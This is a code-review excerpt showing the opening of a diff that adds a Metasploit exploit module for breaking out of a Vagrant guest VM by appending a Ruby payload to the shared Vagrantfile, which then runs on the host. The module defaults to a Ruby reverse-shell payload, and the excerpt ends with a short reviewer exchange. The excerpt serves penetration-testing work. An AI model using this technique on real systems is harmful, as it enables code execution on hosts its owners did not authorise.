modules/exploits/multi/local/vagrant_synced_folder_vagrantfile_breakout.rb

```diff
@@ -0,0 +1,121 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Vagrant Synced Folder Vagrantfile Breakout',
+        'Description' => %q{
+          This module exploits a default Vagrant synced folder (shared folder)
+          to append a Ruby payload to the Vagrant project Vagrantfile config file.
+
+          By default, unless a Vagrant project explicity disables shared folders,
+          Vagrant mounts the project directory on the host as a writable 'vagrant'
+          directory on the guest virtual machine. This directory includes the
+          project Vagrantfile configuration file.
+
+          Ruby code within the Vagrantfile is loaded and executed when a user
+          runs any vagrant command from the project directory on the host,
+          leading to execution of Ruby code on the host.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'HashiCorp', # Vagrant defaults
+          'bcoles' # Metasploit
+        ],
+        'DisclosureDate' => '2011-01-19', # Vagrant 0.7.0 release date - first mention of shared folders in CHANGELOG
+        'Platform' => %w[ruby],
+        'Arch' => ARCH_ALL,
+        'SessionTypes' => [ 'shell', 'powershell', 'meterpreter' ],
+        'DefaultOptions' => {
+          'PAYLOAD' => 'ruby/shell_reverse_tcp',
+          'DisablePayloadHandler' => true
+        },
+        'Targets' => [
+          [ 'Automatic', {} ],
+        ],
+        'References' => [
+          ['URL', 'https://www.vagrantup.com/docs/synced-folders'],
+          ['URL', 'https://www.virtualbox.org/manual/ch04.html#sharedfolders']
+        ],
+        'Notes' => {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ]
+        }
+      )
+    )
+  end
+
+  # Search potential default shared directories for Vagrantfile configuration file
+  def find_vagrantfile_path
+    # Default Vagrant synced folders (aka shared folders)
+    default_shared_directories = [
```

Comment:
Would it be worth adding a datastore option for users to specify further directories to check?

Reply:
Unlikely but I've added it anyway